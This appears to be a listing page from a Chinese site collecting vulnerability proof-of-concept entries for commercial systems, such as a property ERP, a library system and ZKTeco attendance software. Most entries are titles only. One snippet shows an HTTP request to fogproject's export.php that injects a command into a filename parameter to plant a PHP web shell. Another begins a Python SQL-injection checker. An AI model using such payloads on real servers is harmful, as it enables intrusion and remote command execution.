POC 第49页
天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞_秃兔安全
广州图创-图书馆集群管理系统-PermissionAC_秃兔安全
【通用】电子图书阅读平台 downFile  SQL注入_秃兔安全

【通用】电子图书阅读平台 downFile SQL注入

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
01175
用友-畅捷通CRM-任意文件上传_秃兔安全
【2025特殊通用】Easy7监控平台 downloadResource  文件读取_秃兔安全

【2025特殊通用】Easy7监控平台 downloadResource 文件读取

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29212天前
0625
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
0705
捷诚管理信息系统 SQL注入漏洞_秃兔安全

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
0955
【通用】龙腾码支付 payservicecurl 任意文件读取漏洞_秃兔安全

【通用】龙腾码支付 payservicecurl 任意文件读取漏洞

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2923个月前
0685
华天动力-OA-downloadWpsFile任意文件读取_秃兔安全
【2025特殊通用】ZKTeco考勤管理系统 ic1ock sqli_秃兔安全

【2025特殊通用】ZKTeco考勤管理系统 ic1ock sqli

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29220天前
0565